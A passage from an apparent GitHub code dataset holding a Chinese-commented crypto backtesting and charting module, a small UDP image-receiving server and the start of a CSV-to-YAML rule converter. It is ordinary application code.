int(math.log(float(x), 0.1)))\n min_qtys = min_qty_df['最小下单量'].to_numpy(dtype=np.float64)\n\n time_index = pd.date_range(\n start=start_date,\n end=end_date +\n datetime.timedelta(\n hours=1),\n freq='1H')\n # op cl 数据转换 为numpy\n open_price_df = symbols_data.pivot_table(\n index=['candle_begin_time'],\n columns=['symbol'],\n values=['avg_price'])\n close_price_df = symbols_data.pivot_table(\n index=['candle_begin_time'],\n columns=['symbol'],\n values=['close'])\n open_price_df = open_price_df.loc[start_date:end_date]\n close_price_df = close_price_df.loc[start_date - datetime.timedelta(hours=1):end_date]\n # 和内部规则恰好一致\n # open_price_df = open_price_df.rename(columns=replace_symbol_to_int)\n # close_price_df = close_price_df.rename(columns=replace_symbol_to_int)\n open_prices = open_price_df.to_numpy(dtype=np.float64)\n close_prices = close_price_df.to_numpy(dtype=np.float64)\n\n N = pd.date_range(start=start_date, end=end_date, freq='1H').shape[0]\n # 初始化 币安钱包账户\n account = np.zeros((N + 1, 6), dtype=np.float64)\n # 初始化 合约持仓账户\n symbol_info = np.zeros((len(all_symbol_list), 13), dtype=np.float64)\n # 选币模式\n account, month_turnover_rate_list, symbol_info_list, ls_list, hold_symbol_list = neutral_playback(playCfg, N, p_signal_fun, select_long, select_short, account, symbol_info, open_prices, close_prices, quit_arry, min_qtys, arr_data)\n account_df = pd.DataFrame(\n account,\n index=time_index,\n columns=[\n 'totalWalletBalance',\n 'totalMarginBalance',\n 'totalRealizedProfit',\n 'totalUnRealizedProfit',\n 'commission',\n 'marginRatio'])\n # 爆仓处理 min_marginRatio = 0.01\n if account_df['marginRatio'].min() < min_marginRatio:\n temp = account_df['marginRatio'].min()\n log.warning(f'保证金比例: {temp} 小于 {min_marginRatio},恭喜您爆仓了!')\n ind = account_df[account_df['marginRatio'] < min_marginRatio].index[0]\n account_df.loc[ind:, ['totalWalletBalance', 'totalMarginBalance']] = 1e-8\n df = pd.DataFrame([] + [x[0] for x in hold_symbol_list])\n df = df.replace(replace_symbol_to_int_)\n df.fillna('', inplace=True)\n df = df + ' '\n if df.shape[1] == 0:\n df[0] = ''\n long_hold = df[0]\n else:\n long_hold = df.sum(axis=1).str.strip()\n df = pd.DataFrame([] + [x[1] for x in hold_symbol_list])\n df = df.replace(replace_symbol_to_int_)\n df.fillna('', inplace=True)\n df = df + ' '\n if df.shape[1] == 0:\n df[0] = ''\n short_hold = df[0]\n else:\n short_hold = df.sum(axis=1).str.strip()\n\n if hourly_details:\n res_list = Parallel(\n n_jobs=-2,\n verbose=0)(\n delayed(cal_hourly_details)(\n replace_symbol_to_int,\n time_index,\n i,\n data) for i,\n data in enumerate(symbol_info_list))\n display_list = [x[0] for x in res_list]\n order_df_list = [x[1] for x in res_list]\n display_df = pd.concat(display_list)\n display_df = display_df.rename(columns={'candle_begin_time': 'display_time'})\n display_df = display_df.set_index(['display_time', 'symbol'])\n # display_df = display_df[display_df['持仓市值'] >= 1]\n order_df = pd.concat(order_df_list)\n order_df = order_df.rename(columns={'candle_begin_time': 'trade_time'})\n\n order_df = order_df.set_index(['trade_time', 'symbol'])\n else:\n display_df = pd.DataFrame()\n order_df = pd.DataFrame()\n\n ls_df = pd.DataFrame((np.array(ls_list).transpose(\n ) / account[:, 1]).transpose(), columns=['多头占比', '空头占比'], index=time_index).round(4)\n\n ls_df['资金曲线'] = account_df['totalMarginBalance'] / \\\n account_df['totalMarginBalance'].iloc[0]\n # 策略评价\n res, curve = freestep_evaluate(ls_df, long_hold, short_hold,\n month_turnover_rate_list=month_turnover_rate_list, compound_name=compound_name)\n cmmmission_loss = (1 - account_df['commission'] / account_df['totalMarginBalance']).cumprod().iloc[-1] - 1\n\n res['交易费率'] = c_rate * 10000\n res['leverage'] = leverage\n res['手续费磨损净值'] = cmmmission_loss * res['累积净值'].iloc[0]\n final_trade_usdt = round(account_df.iloc[-1]['totalMarginBalance'], 2)\n cmmmission_sum = round(account_df['commission'].sum(), 2)\n # 取出需要调整顺序的列数据'D'\n d = res.pop('手续费磨损净值')\n # 利用insert方法插入取出的数据列到指定位置\n res.insert(1, '手续费磨损净值', d)\n log.info(f'初始投入资产: {initial_trade_usdt} U,最终账户资产: {final_trade_usdt} U, 共支付手续费: {-cmmmission_sum} U')\n account_df.index = account_df.index - datetime.timedelta(hours=1)\n curve.index = curve.index - datetime.timedelta(hours=1)\n return res, curve, account_df, display_df, order_df\n\n\ndef multi_list_merge(df_list, on=None, how='inner'):\n if len(df_list) == 1:\n return df_list[0]\n if on == None:\n for i in range(len(df_list) - 1):\n if i == 0:\n merge_df = pd.merge(df_list[0], df_list[1], left_index=True, right_index=True, how=how)\n else:\n merge_df = merge_df.merge(df_list[i + 1], left_index=True, right_index=True, how=how)\n else:\n for i in range(len(df_list) - 1):\n if i == 0:\n merge_df = pd.merge(df_list[0], df_list[1], on=on, how=how)\n else:\n merge_df = merge_df.merge(df_list[i + 1], on=on, how=how)\n return merge_df\n\n\ndef w_log(p, coins_num):\n array = np.arange(1, coins_num + 1)\n if p > 0:\n array = np.log(array + p)\n else:\n array = np.full(coins_num, 1)\n weight_array = array[::-1] / array.sum()\n return weight_array\n\n\n# 横截面\ndef cal_factor_by_cross(df, factor_long_list, factor_short_list, pct_enable=False):\n feature_list = tools.convert_to_feature(factor_long_list + factor_short_list)\n # ===数据预处理\n df = df.set_index(['candle_begin_time', 'symbol']).sort_index()\n # 横截面排名\n df[feature_list] = df.groupby('candle_begin_time')[feature_list].apply(\n lambda x: x.rank(pct=pct_enable, ascending=True))\n df[feature_list] = df.groupby('candle_begin_time')[\n feature_list].apply(lambda x: x.fillna(x.median()))\n df.reset_index(inplace=True)\n\n df = tools.cal_factor_by_vertical(df, factor_long_list, factor_tag='多头因子')\n df = tools.cal_factor_by_vertical(df, factor_short_list, factor_tag='空头因子')\n\n return df\n\n\n# 纵截面\ndef cal_factor_by_vertical(df, factor_long_list, factor_short_list):\n\n '''纵截面数据处理更新'''\n feature_list = tools.convert_to_feature(factor_long_list + factor_short_list)\n # ===数据预处理\n df = df.set_index(['candle_begin_time', 'symbol']).sort_index()\n df[feature_list] = df.groupby('candle_begin_time')[\n feature_list].apply(lambda x: x.fillna(x.median()))\n df.reset_index(inplace=True)\n '''纵截面数据处理更新'''\n\n\n df = tools.cal_factor_by_vertical(df, factor_long_list, factor_tag='多头因子')\n df = tools.cal_factor_by_vertical(df, factor_short_list, factor_tag='空头因子')\n return df\n\n\n# np选币\ndef np_gen_selected(df, base_index, filter_before_exec, filter_after_exec, select_by_hour, playCfg, select_offsets, white_list, black_list, replace_symbol_to_int):\n import copy\n c_rate, hold_hour_num, long_coin_num, short_coin_num, long_p, short_p, leverage, long_risk_position, initial_trade_usdt, offset_stop_win, offset_stop_loss = load_playCfg(playCfg)\n\n df['weight'] = 0\n df['assign_usdt'] = 0\n df['weight_ratio'] = 1\n df['time'] = df['candle_begin_time'].copy()\n df['candle_begin_time'] = pd.to_numeric(df['candle_begin_time'])\n base_time = pd.to_numeric(pd.Series(pd.to_datetime('20170101'))).iloc[0]\n df['offset'] = (df['candle_begin_time'] - base_time) / 3.6e12 % hold_hour_num\n\n df1 = df.copy()\n df2 = df.copy()\n time_length = len(df['time'].unique())\n\n # 前置过滤\n # print(df1.groupby('time').size())\n # print(df2.groupby('time').size())\n # print(df1.groupby('time').size().min())\n\n\n df1, df2 = filter_before(df1, df2, filter_before_exec, white_list, black_list, replace_symbol_to_int)\n # print(df1.groupby('time').size())\n # print(df2.groupby('time').size())\n # print(df1.groupby('time').size().min())\n\n time_length1 = len(df1['time'].unique())\n time_length2 = len(df2['time'].unique())\n if time_length != np.mean([time_length1, time_length2]):\n log.warning('由于过滤因子异常或过滤条件苛刻,导致某些小时合约数量不够,进入容错选币算法,数量不够的小时将空仓,耗时很长。建议检查过滤条件,多空不平衡玩法可以在后置过滤完成')\n\n df1_miss = (set(df['time'].unique()) - set(df1['time'].unique()))\n df2_miss = (set(df['time'].unique()) - set(df2['time'].unique()))\n log.warning(f'多头缺失日期:{df1_miss}')\n log.warning(f'空头缺���日期:{df2_miss}')\n\n filter_miss = True\n else:\n filter_miss = False\n\n # 后置过滤前置化\n df1, df2 = filter_after(df1, df2, filter_after_exec)\n\n # 指定offset\n long_select_offset, short_select_offset = select_offsets\n if long_select_offset:\n df1.loc[df1['offset'].isin(long_select_offset), 'weight_ratio'] *= (hold_hour_num / len(long_select_offset))\n df1.loc[~df1['offset'].isin(long_select_offset), 'weight_ratio'] = 0\n if short_select_offset:\n df2.loc[df2['offset'].isin(short_select_offset), 'weight_ratio'] *= (hold_hour_num / len(short_select_offset))\n df2.loc[~df2['offset'].isin(short_select_offset), 'weight_ratio'] = 0\n\n # 权重计算\n long_weight_array = w_log(p=long_p, coins_num=long_coin_num)\n short_weight_array = w_log(p=short_p, coins_num=short_coin_num)\n arr1 = df1[['candle_begin_time', 'symbol', 'close', 'weight', 'assign_usdt', '多头因子', 'weight_ratio']].to_numpy(\n dtype='float64')\n arr2 = df2[['candle_begin_time', 'symbol', 'close', 'weight', 'assign_usdt', '空头因子', 'weight_ratio']].to_numpy(\n dtype='float64')\n\n arr = arr1.copy()\n arr = np.split(arr, np.unique(arr[:, 0], return_index=True)[1][1:])\n arr_list_long = copy.deepcopy(arr)\n ll = []\n for temp in arr:\n temp[:, 5] = temp[:, 5].argsort().argsort() + 1\n ll.append(temp[np.where(temp[:, 5] <= long_coin_num)])\n select_coin_long = np.vstack(ll)\n\n arr = arr2.copy()\n arr = np.split(arr, np.unique(arr[:, 0], return_index=True)[1][1:])\n arr_list_short = copy.deepcopy(arr)\n\n ll = []\n for temp in arr:\n temp[:, 5] = (-temp[:, 5]).argsort().argsort() + 1\n ll.append(temp[np.where(temp[:, 5] <= short_coin_num)])\n select_coin_short = np.vstack(ll)\n\n boll1 = select_coin_long.shape[0] != len(base_index) * long_coin_num\n boll2 = select_coin_short.shape[0] != len(base_index) * short_coin_num\n if boll1 | boll2:\n if not filter_miss:\n log.warning('由于过滤后或日期范围内合约数量不够,进入容错选币算法,耗时很长')\n log.warning('建议选2币的起始日期在2020年1月10日之后,3币2月1日之后,10币3月3日之后')\n\n all_arr = df[['candle_begin_time', 'symbol', 'close', 'weight', 'assign_usdt', '空头因子', 'weight_ratio']].to_numpy(\n dtype='float64')\n arr_list_long = []\n arr_list_short = []\n ll_long = []\n ll_short = []\n for cat in np.unique(all_arr[:, 0]):\n long = arr1[arr1[:, 0] == cat]\n boll1 = long.shape[0] >= long_coin_num\n short = arr2[arr2[:, 0] == cat]\n boll2 = short.shape[0] >= short_coin_num\n if boll1 and boll2:\n arr_list_long.append(long.copy())\n arr_list_short.append(short.copy())\n long[:, 5] = long[:, 5].argsort().argsort() + 1\n long = long[np.where(long[:, 5] <= long_coin_num)]\n ll_long.append(long)\n short[:, 5] = (-short[:, 5]).argsort().argsort() + 1\n short = short[np.where(short[:, 5] <= short_coin_num)]\n ll_short.append(short)\n else:\n fillarr = all_arr[all_arr[:, 0] == cat]\n fillarr = np.vstack([fillarr[:long_coin_num], fillarr[:short_coin_num]])\n fillarr[:, 6] = 0\n arr_list_long.append(fillarr)\n arr_list_short.append(fillarr)\n ll_long.append(fillarr[:long_coin_num])\n ll_short.append(fillarr[:short_coin_num])\n\n select_coin_long = np.vstack(ll_long)\n select_coin_short = np.vstack(ll_short)\n\n boll1 = select_coin_long.shape[0] == len(base_index) * long_coin_num\n boll2 = select_coin_short.shape[0] == len(base_index) * short_coin_num\n assert boll1 & boll2\n\n for rank, w in enumerate(long_weight_array):\n select_coin_long[:, 3] = np.where(select_coin_long[:, 5] == rank + 1, w, select_coin_long[:, 3])\n for rank, w in enumerate(short_weight_array):\n select_coin_short[:, 3] = np.where(select_coin_short[:, 5] == rank + 1, w, select_coin_short[:, 3])\n\n select_coin_long[:, 3] = select_coin_long[:, 3] * select_coin_long[:, 6]\n select_coin_short[:, 3] = select_coin_short[:, 3] * select_coin_short[:, 6]\n if not select_by_hour:\n arr_data = []\n else:\n arr_data = [arr_list_long, arr_list_short, long_weight_array, short_weight_array]\n return select_coin_long[:, 1:5], select_coin_short[:, 1:5], arr_data\n\n\n# 前置过滤\ndef filter_before(df1, df2, exec_list, white_list, black_list, replace_symbol_to_int):\n # 固定黑名单与固定白名单\n long_white_list, short_white_list = white_list\n long_black_list, short_black_list = black_list\n\n not_exist_list = [x for x in long_white_list + short_white_list if x not in replace_symbol_to_int]\n if not_exist_list: log.warning(f'白名单中 {not_exist_list}这些���种本地整理的数据中不存在')\n\n long_white_list = [replace_symbol_to_int.get(k, 9999) for k in long_white_list]\n short_white_list = [replace_symbol_to_int.get(k, 9999) for k in short_white_list]\n\n not_exist_list = [x for x in long_black_list + short_black_list if x not in replace_symbol_to_int]\n if not_exist_list: log.warning(f'黑名单中 {not_exist_list}这些币种本地整理的数据中不存在')\n\n long_black_list = [replace_symbol_to_int.get(k, 9999) for k in long_black_list]\n short_black_list = [replace_symbol_to_int.get(k, 9999) for k in short_black_list]\n # log.info(long_white_list)\n # log.info(short_white_list)\n if long_white_list:\n df1 = df1[df1['symbol'].isin(long_white_list)]\n if short_white_list:\n df2 = df2[df2['symbol'].isin(short_white_list)]\n if long_black_list:\n df1 = df1[~df1['symbol'].isin(long_black_list)]\n if short_black_list:\n df2 = df2[~df2['symbol'].isin(short_black_list)]\n\n d = {'df1': df1, 'df2': df2}\n for content in exec_list:\n try:\n exec(content, globals(), d)\n df1 = d['df1']\n df2 = d['df2']\n except IndentationError as e:\n raise ValueError(f'{e}:', '请删掉过滤条件每行开头的缩进!')\n return df1, df2\n\n\n# 后置过滤\ndef filter_after(df1, df2, exec_list):\n d = {'df1': df1, 'df2': df2}\n for content in exec_list:\n try:\n exec(content, globals(), d)\n df1 = d['df1']\n df2 = d['df2']\n except IndentationError as e:\n raise ValueError(f'{e}:', '请删掉过滤条件每行开头的缩进!')\n return df1, df2\n\n\ndef gen_selected(df, long_coin_num, short_coin_num, long_p, short_p, header_columns, filter_before_exec, filter_after_exec):\n df1 = df.copy()\n df2 = df.copy()\n # 前置过滤\n df1, df2 = filter_before(df1, df2, filter_before_exec)\n\n # 根据因子对比进行排名\n # 从小到大排序\n df1['排名1'] = df1.groupby('candle_begin_time')['多头因子'].rank(method='first')\n df1 = df1[(df1['排名1'] <= long_coin_num)].copy()\n df1['方向'] = 1\n\n # 从大到小排序\n df2['排名2'] = df2.groupby('candle_begin_time')['空头因子'].rank(\n method='first', ascending=False)\n df2 = df2[(df2['排名2'] <= short_coin_num)].copy()\n df2['方向'] = -1\n\n df1['排名'] = df1['排名1']\n df2['排名'] = df2['排名2']\n del df2['排名2']\n del df1['排名1']\n df1.sort_values('candle_begin_time', ascending=True, inplace=True)\n df1.reset_index(drop=True, inplace=True)\n df2.sort_values('candle_begin_time', ascending=True, inplace=True)\n df2.reset_index(drop=True, inplace=True)\n long_weight_array = w_log(p=long_p, coins_num=long_coin_num)\n short_weight_array = w_log(p=short_p, coins_num=short_coin_num)\n for rank, w in enumerate(long_weight_array):\n df1.loc[df1['排名'] == rank + 1, 'weight'] = w\n for rank, w in enumerate(short_weight_array):\n df2.loc[df2['排名'] == rank + 1, 'weight'] = w\n # 后置过滤\n df1, df2 = filter_after(df1, df2, filter_after_exec)\n return df1[header_columns], df2[header_columns]\n\n\n# 可视化\ndef playback_plot(curve):\n import matplotlib as mpl\n mpl.rcParams[\"font.sans-serif\"] = [\"SimHei\"] # 展示中文字体\n mpl.rcParams[\"axes.unicode_minus\"] = False # 处理负刻度值\n nv = curve.iloc[:, 0]\n dd = (nv / nv.cummax() - 1) * 100\n fig, ax1 = plt.subplots() # subplots一定要带s\n fig.set_size_inches(14, 8)\n ax2 = ax1.twinx() # twinx将ax1的X轴共用与ax2,这步很重要\n ax1.fill_between(dd.index, 0, dd, color='#95a3a6', alpha=0.4)\n # ax1.set_ylabel('Log')\n ax2.plot(nv, c='r')\n ax2.grid(True, axis='both', color='#95a3a6')\n ax1.grid(False, axis='y')\n ax1.tick_params(labelsize=18)\n ax2.tick_params(labelsize=18)\n ax1.legend(['最大回撤'], loc='center left', fontsize=18)\n ax2.legend(['净值'], loc='center right', fontsize=18)\n # ax2.set_ylabel('Log')\n ax2.set_yscale('log')\n ax2.set_title(f'中性策略回放', fontsize=24)\n plt.show()\n\n\ndef plot_output(x, data, data_path, save_html=True):\n x = x.copy()\n data.index.name = ''\n data = data[['累积净值', '年化收益', '月化收益', '月信息比', '月化波动', '月换手率', '月化收益回撤比', '累积净值', '最大回撤', '最大回撤开始时间',\n '最大回撤结束时间', '胜率', '盈亏收益比', '单周期最大盈利',\n '单周期大亏损', '交易费率', 'leverage']].reset_index()\n data['交易费率'] = data['交易费率'].round(1).astype('int')\n part1 = data.iloc[:, :1].T.values.tolist()\n\n part2 = np.round(data.iloc[:, 1:9].T.values, 2).tolist()\n\n part3 = data.iloc[:, 9:].T.values.tolist()\n\n values = part1 + part2 + part3\n x['net_value'] = x['资金曲线'].round(4)\n\n x.reset_index(inplace=True)\n x['long_hold_symbol'] = x['long_hold_symbol'].str.replace('USDT', '')\n x['short_hold_symbol'] = x['short_hold_symbol'].str.replace('USDT', '')\n\n fig = make_subplots(\n rows=3, cols=1, shared_xaxes=True, vertical_spacing=0.02,\n specs=[[{\"type\": \"table\", \"secondary_y\": False}],\n [{\"type\": \"xy\", \"secondary_y\": True}],\n [{\"type\": \"xy\", \"secondary_y\": True}]],\n row_heights=[0.1, 0.75, 0.15],\n )\n\n # 主图\n fig.add_trace(\n go.Scatter(x=x['candle_begin_time'], y=x['net_value'], mode='lines', name='策略净值',\n text=x['long_hold_symbol'] + ' --- ' + x['short_hold_symbol']),\n secondary_y=False, row=2, col=1,\n )\n\n fig.add_trace(\n go.Scatter(x=x['candle_begin_time'], y=(x['net_value'] / x['net_value'].cummax() - 1).round(4), mode='lines', name='最大回撤',\n line={'color': 'rgba(192,192,192,0.6)', 'width': 1}),\n secondary_y=True, row=2, col=1,\n )\n\n # 副图\n fig.add_trace(\n go.Scatter(x=x['candle_begin_time'], y=x['多头占比'], mode='none', name='多头杠杆率', stackgroup='one'),\n secondary_y=False, row=3, col=1,\n )\n fig.add_trace(\n go.Scatter(x=x['candle_begin_time'], y=x['空头占比'], mode='none', name='空头杠杆率', stackgroup='one'),\n secondary_y=False, row=3, col=1,\n )\n fig.add_trace(\n go.Bar(x=x['candle_begin_time'], y=(x['多头占比'] - x['空头占比']), name='多空敞口差额'),\n secondary_y=False, row=3, col=1,\n )\n fig.add_trace(\n go.Table(\n header=dict(values=list(data.columns), # 表头取值是data列属性\n fill_color='paleturquoise', # 填充色和文本位置\n align='center'),\n cells=dict(values=values, # 单元格的取值就是每个列属性的Series取值\n fill_color='lavender',\n align='center'\n ),\n columnwidth=[90, 40, 40, 35, 35, 35, 35, 50, 35, 35, 90, 90, 30, 40, 60, 60, 40, 40]),\n secondary_y=False, row=1, col=1,\n )\n fig.update_layout(\n yaxis_type='log', yaxis2_type='linear',\n template='none', hovermode='x', width=1650, height=950,\n xaxis_rangeslider_visible=False,\n )\n html_path = os.path.join(data_path, '净值曲线持仓图.html')\n\n if save_html:\n fig.write_html(file=html_path, config={'scrollZoom': True})\n else:\n fig.show(config={'scrollZoom': True})\n\n\ndef curve_playback(curve, play_start_time, step=6, sleeptime=0.2):\n # === 绘图显示中文\n if platform.system() == 'Windows':\n # windows\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n else:\n # mac\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS'] # 指定默认字体\n nv = curve.iloc[:, 0]\n dd = (nv / nv.cummax() - 1) * 100\n fig, ax1 = plt.subplots() # subplots一定要带s\n fig.set_size_inches(14, 8)\n ax2 = ax1.twinx() # twinx将ax1的X轴共用与ax2,这步很重要\n _curve = curve.reset_index()\n i = _curve[_curve['candle_begin_time'] >= play_start_time].index[0]\n _i = i - 1\n for i in range(i, curve.shape[0], step):\n end_time = curve.index[i]\n ax1.cla()\n ax2.cla()\n # ax1.plot(curve['最大回撤'].iloc[:i],c='r')\n ax1.fill_between(dd.iloc[:i].index, 0, dd.iloc[:i], color='#95a3a6', alpha=0.4)\n # ax1.set_ylabel('EXP')\n ax2.plot(nv.iloc[:_i], c='r')\n ax2.plot(nv.iloc[_i:i], c='blue')\n ax2.grid(True, axis='both', color='#95a3a6')\n ax1.grid(False, axis='y')\n ax1.tick_params(labelsize=18)\n ax2.tick_params(labelsize=18)\n ax1.legend(['最大回撤'], loc='center left', fontsize=18)\n ax2.legend(['净值'], loc='center right', fontsize=18)\n # ax2.set_ylabel('Log')\n ax2.set_title(f'策略回放 起始时间:{curve.index[_i]} 截止时间:{end_time}', fontsize=18)\n plt.pause(sleeptime)\n plt.show()\n\n\ndef plot(select_c, mdd_std=0.2):\n # plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n # plt.figure(figsize=(12, 6), dpi=80)\n # plt.figure(1)\n\n condition = (select_c['dd2here'] >= -mdd_std) & (select_c['dd2here'].shift(1) < -mdd_std)\n select_c[f'回撤上穿{mdd_std}次数'] = 0\n select_c.loc[condition, f'回撤上穿{mdd_std}次数'] = 1\n mdd_num = int(select_c[f'回撤上穿{mdd_std}次数'].sum())\n ax = plt.subplot(2, 1, 1)\n\n plt.subplots_adjust(hspace=1) # 调整子图间距\n plt.title(f'Back draw{mdd_std} Number: {mdd_num}', fontsize='large', fontweight='bold', color='blue', loc='center') # 设置字体大小与格式\n ax.plot(select_c['candle_begin_time'], select_c['资金曲线'])\n ax2 = ax.twinx() # 设置y轴次轴\n ax2.plot(select_c[\"candle_begin_time\"], -select_c['dd2here'], color='red', alpha=0.4)\n\n\n# plt.show()\ndef plot_log(ret, title):\n # plt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n # plt.figure(figsize=(12, 6), dpi=80)\n # plt.figure(1)\n import matplotlib\n ax = plt.subplot(2, 1, 2)\n ax_left = ax\n ax_right = ax_left.twinx()\n ret = ret.copy()\n ret.index = pd.to_datetime(ret.index)\n nv = (1 + ret).cumprod() # 净值\n dd = nv / nv.cummax() - 1 # 回撤\n # 右轴:净值曲线\n ax_right.grid(False)\n ax_right.plot(nv.index, nv.values, color='red')\n ax_right.set(xlim=(nv.index[0], nv.index[-1]))\n # 左轴:ax, 回撤\n # y2 = dd.values * 100\n y2 = dd['本周期多空涨跌幅'] * 100\n ax_left.fill_between(dd.index, 0, y2, color='#95a3a6', alpha=0.4)\n ax_left.set_ylim((ax_left.get_ylim()[0], 0))\n ax_left.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f%%'))\n ax_left.grid(False, axis='y')\n # ax_right.grid(True, axis='y', color='#95a3a6')\n ax_right.grid(True, axis='both', color='#95a3a6')\n ax_left.legend(['回撤'], loc='center left')\n ax_right.legend(['净值'], loc='center right')\n if title is not None:\n ax_left.set_title(title)\n\n ax_right.set_yscale('log')\n\n\ndef multi_plot(curve):\n # 原版评价作图\n curve['本周期多空涨跌幅'] = curve['资金曲线'].pct_change().fillna(0)\n curve = curve.reset_index()\n rtn, select_c = ind.cal_ind(curve)\n\n # === 绘图显示中文\n if platform.system() == 'Windows':\n # windows\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n elif platform.system() == 'Linux':\n # Linux\n plt.rcParams['font.sans-serif'] = ['AR PL UKai CN'] # 指定默认字体\n else:\n # mac\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS'] # 指定默认字体\n plt.figure(figsize=(12, 6), dpi=80)\n plt.figure(1)\n\n # 收益回撤曲线图\n plot(select_c, mdd_std=0.2)\n # 对数图\n ret = curve[['candle_begin_time', '本周期多空涨跌幅']]\n ret = ret.set_index('candle_begin_time')\n title = '收益(对数坐标)-回撤'\n plot_log(ret, title)\n plt.show()\n\n\ndef plot_log_double(curve, mdd_std=0.2, path='./'):\n # 原版评价作图\n curve['本周期多空涨跌幅'] = curve['资金曲线'].pct_change().fillna(0)\n curve = curve.reset_index()\n all_select_df = curve\n rtn, select_c = ind.cal_ind(curve)\n # === 绘图显示中文\n if platform.system() == 'Windows':\n # windows\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n elif platform.system() == 'Linux':\n # Linux\n plt.rcParams['font.sans-serif'] = ['AR PL UKai CN'] # 指定默认字体\n else:\n # mac\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS'] # 指定默认字体\n plt.figure(figsize=(12, 6), dpi=80)\n condition = (select_c['dd2here'] >= -mdd_std) & (select_c['dd2here'].shift(1) < -mdd_std)\n select_c[f'回撤上穿{mdd_std}次数'] = 0\n select_c.loc[condition, f'回撤上穿{mdd_std}次数'] = 1\n mdd_num = int(select_c[f'回撤上穿{mdd_std}次数'].sum())\n ax = plt.subplot(2, 1, 1)\n\n plt.subplots_adjust(hspace=1) # 调整子图间距\n plt.title(f'Back draw{mdd_std} Number: {mdd_num}', fontsize='large', fontweight='bold', color='blue',\n loc='center') # 设置字体大小与格式\n ax.plot(select_c['candle_begin_time'], select_c['资金曲线'])\n ax2 = ax.twinx() # 设置y轴次轴\n ax2.plot(select_c[\"candle_begin_time\"], -select_c['dd2here'], color='red', alpha=0.4)\n\n # 对数图\n ret = all_select_df[['candle_begin_time', '本周期多空涨跌幅']]\n ret = ret.set_index('candle_begin_time')\n title = 'Balance Curve(Log) - Back draw'\n ax = plt.subplot(2, 1, 2)\n ax_left = ax\n ax_right = ax_left.twinx()\n ret = ret.copy()\n ret.index = pd.to_datetime(ret.index)\n nv = (1 + ret).cumprod() # 净值\n dd = nv / nv.cummax() - 1 # 回撤\n # 右轴:净值曲线\n ax_right.grid(False)\n ax_right.plot(nv.index, nv.values, color='red')\n ax_right.set(xlim=(nv.index[0], nv.index[-1]))\n # 左轴:ax, 回撤\n # y2 = dd.values * 100\n y2 = dd['本周期多空涨跌幅'] * 100\n ax_left.fill_between(dd.index, 0, y2, color='#95a3a6', alpha=0.4)\n ax_left.set_ylim((ax_left.get_ylim()[0], 0))\n ax_left.yaxis.set_major_formatter(tc.FormatStrFormatter('%.1f%%'))\n ax_left.grid(False, axis='y')\n ax_right.grid(True, axis='both', color='#95a3a6')\n ax_left.legend(['Back draw'], loc='center left')\n ax_right.legend(['Balance'], loc='center right')\n if title is not None:\n ax_left.set_title(title)\n\n # 倍增图叠加\n balance_list = [all_select_df.loc[0, '资金曲线']]\n time_list = [all_select_df.loc[0, 'candle_begin_time']]\n balance = all_select_df.loc[0, '资金曲线']\n while balance <= all_select_df['资金曲线'].max():\n balance *= 2\n _df = all_select_df[all_select_df['资金曲线'] >= balance]\n _df.reset_index(drop=True, inplace=True)\n if _df.shape[0] > 0:\n balance_list.append(_df.loc[0, '资金曲线'])\n time_list.append(_df.loc[0, 'candle_begin_time'])\n ax_right.scatter(time_list, balance_list, color='red')\n ax_right.set_yscale('log')\n\n plt.show()\n","repo_name":"RootSherry/NK_quant","sub_path":"src_backtesting/playback/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":66453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28720751719","text":"import restoreModel as model\nimport socket\nimport base64\n# from PIL import Image\n# import matplotlib.pyplot as plt\n# import matplotlib.image as mpimg\n\nipServer = \"10.0.0.10\"\nportServer = 6789\n\n\nserverSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nserverSocket.bind((ipServer, portServer))\n\nclientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# model.main()\n\nwhile True:\n data, addr = serverSocket.recvfrom(58096)\n # newdata = data[:4] + data[lenght(data):]\n data1 = base64.b64decode(data)\n fh = open(\"./try/try.png\", \"wb\")\n fh.write(data1)\n fh.close()\n # print(data)\n if(data1):\n # image = mpimg.imread('./try.png')\n # plt.imshow(image)\n # plt.show()\n print(\"message\", data1)\n clientSocket.sendto(model.test().encode(), (addr))\n print('okk')\n\n","repo_name":"DeafTranslator/server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1363715189","text":"import json\nimport csv\nimport yaml\ntry:\n from yaml import CLoader as Loader, CDumper as Dumper\nexcept ImportError:\n from yaml import Loader, Dumper\n\n\nimport typer\n\n\napp = typer.Typer()\n\nMAPPER_FILE = '../refined/prepared.csv'\nDATA_THEMES_FILE = '../reference/data_themes.yaml'\nISO19115_FILE = '../reference/iso19115.yaml'\nRULES_THEME_FILE = '../reference/rules_data_theme.yaml'\nRULES_GEO_FILE = '../reference/rules_geo.yaml'\n\n\n@app.command()\ndef convert():\n \"\"\"Convert mapped data to yaml rules\"\"\"\n themes = {}\n f = open(DATA_THEMES_FILE, 'r', encoding='utf8')\n themes_data = yaml.load(f, Loader=Loader)\n f.close()\n for row in themes_data:\n print(row)\n themes[row['id']] = row['name']\n\n data_geo = []\n data_theme = []\n texts = []\n f = open(MAPPER_FILE, 'r', encoding='utf8')\n reader = csv.DictReader(f, delimiter=',') \n for row in reader:\n print(row)\n text = row['Name']\n if len(row['Data theme']) > 0:\n parts = row['Data theme'].split(',')\n record = {'key': text, 'topics' : []}\n for part in parts:\n record['topics'].append(themes[part])\n data_theme.append(record)\n if len(row['EN ISO 19115']) > 0:\n parts = row['EN ISO 19115'].split(',')\n record = {'key': text, 'topics' : []}\n for part in parts:\n record['topics'].append(part)\n data_geo.append(record)\n f.close()\n f = open(RULES_THEME_FILE, 'w', encoding='utf8')\n f.write(yaml.dump(data_theme, Dumper=Dumper))\n f.close()\n f = open(RULES_GEO_FILE, 'w', 